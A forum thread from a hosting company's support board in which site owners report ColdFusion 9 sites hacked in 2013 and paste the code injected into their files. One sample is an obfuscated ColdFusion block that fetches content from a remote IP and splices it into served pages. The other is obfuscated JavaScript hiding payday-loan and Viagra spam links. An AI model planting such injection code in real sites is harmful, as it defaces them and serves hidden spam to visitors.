NTS Forums

Please login or register.

Login with username, password and session length
 

News:

Welcome to the Newtek Technology Services Forum!


Author Topic: CF 9 Site hacked  (Read 10173 times)

Offline wfinley

  • Jr. Member
  • **
  • Posts: 208
  • Karma: +1/-0
    • http://www.couloirgraphics.com
CF 9 Site hacked
« on: February 07, 2013, 06:12:14 PM »
Just a heads up to everyone.  Today one of my CF sites was hacked.  More info on the hack here:
http://forums.adobe.com/message/5046548?tstart=0

The hack injected the following into the application.cfm file:



<!-- qweiop21 -->
<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">
<cfset mmy = cfhttp.FileContent><cfoutput>
#mmy#
</cfoutput>
</cfsavecontent>
<CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">
<cfset cfs = cfhttp.FileContent>
<cfif (FindNoCase("</div>",paga) GT 0)>
<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>
<cfelseif (FindNoCase("</table>",paga) GT 0)>
<cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>
<cfelseif (FindNoCase("</a>",paga) GT 0)>
<cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>
<cfelse>
<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>
</cfif>
<cfoutput>
#paga#
</cfoutput>
<cfabort>
</cfif>
<cffunction name="hSWaawe"> 
<cfargument name="HxzcGlk">
<cfset Ypg = ToString(ToBinary(HxzcGlk))>
<cfreturn Ypg>
</cffunction>

<!-- qweiop22 -->




Offline morovan

  • Hero Member
  • *****
  • Posts: 1,052
  • Karma: +54/-2
Re: CF 9 Site hacked
« Reply #1 on: February 08, 2013, 08:50:01 AM »
It amazes me the lengths these guys will go through to sell Viagra...
www.todayrealestate.com - Search the MLS for all properties for sale on Cape Cod, Massachusetts.

Offline morovan

  • Hero Member
  • *****
  • Posts: 1,052
  • Karma: +54/-2
Re: CF 9 Site hacked
« Reply #2 on: February 08, 2013, 08:52:04 AM »
By the way, the link they are using in the cfhttp call is still active.

Here's a link to the WHOIS for the IP address if you want to try and report them.

http://whois.arin.net/rest/net/NET-199-19-92-0-1/pft
www.todayrealestate.com - Search the MLS for all properties for sale on Cape Cod, Massachusetts.

Offline wfinley

  • Jr. Member
  • **
  • Posts: 208
  • Karma: +1/-0
    • http://www.couloirgraphics.com
Re: CF 9 Site hacked
« Reply #3 on: February 08, 2013, 12:38:15 PM »
Thanks.  Hoping support will do something... submitted the ticket 24 hours ago and still no response.  Not that I expect anything from these guys these days.  Maybe it's time to finally migrate my personal sites as well away from here.

Offline drumWatts

  • Hosting Newbie
  • *
  • Posts: 5
  • Karma: +0/-0
Re: CF 9 Site hacked
« Reply #4 on: February 15, 2013, 01:18:39 AM »
I had one site hacked last week and another this morning - both exactly as described on the Adobe link above. The one last week actually has been hit three times. Each time I deleted the offending code but within a day or two it was back.

FYI, both sites had an index.php hacked - not a CF page.

I sent a ticket to support. Hopefully they'll be on it.

To clarify - both index.php pages had this code snippet inserted:

Code: [Select]
<!-- qweiop21 -->
<script language="JavaScript">function zdrViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();
</script>



<p class="zdroq">
You would usually agree <a href="http://payday-go.co.uk/" title="Payday Loans">payday loans</a> on the payment dates as stated in your agreement contract. This could confuse <a href="http://www.payday-uk-online.co.uk/" title="Payday Loans Online">payday loans online</a> the payday lender. Another <a href="http://for-sale-viagra-uk.co.uk/" title="Viagra Dosage">viagra dosage</a> common requirement for you to get a loan is to have a job. </p><!-- qweiop22 -->

« Last Edit: February 15, 2013, 01:21:33 AM by drumWatts »

Offline jamesedmunds

  • Full Member
  • ***
  • Posts: 680
  • Karma: +21/-0
    • http://jamesedmunds.com/poorclio
Re: CF 9 Site hacked
« Reply #5 on: February 20, 2013, 03:02:49 AM »
Any update on this topic?

Thanks,

James
James Edmunds
New Iberia, LA

Offline wfinley

  • Jr. Member
  • **
  • Posts: 208
  • Karma: +1/-0
    • http://www.couloirgraphics.com
Re: CF 9 Site hacked
« Reply #6 on: September 01, 2013, 03:17:47 PM »
The update is that CT applied the hotfix to the server that got hacked but apparently didn't update all the servers since yet another server got hacked today.  If you have CF9 sites I'd email support and request they apply the hotfix.

https://www.adobe.com/support/security/bulletins/apsb13-13.html

Offline tagfire

  • Hosting Newbie
  • *
  • Posts: 43
  • Karma: +2/-2
    • Tagfire
Re: CF 9 Site hacked
« Reply #7 on: October 11, 2013, 02:04:36 AM »
This is still happening.  One of my clients' sites has been hit several times.

When I email support, they remove the offending code but don't seem to do anything about securing the server.

I believe the problem is that once a vulnerable server has been identified, a 'backdoor' of sorts is added which allows the attacker to continue defacing sites even after the hotfix has been applied.  There's a thread on the Adobe forums that discusses this:
http://forums.adobe.com/message/5047474#5047474

Until the server's vulnerabilities are properly addressed, our sites will continue to be defaced.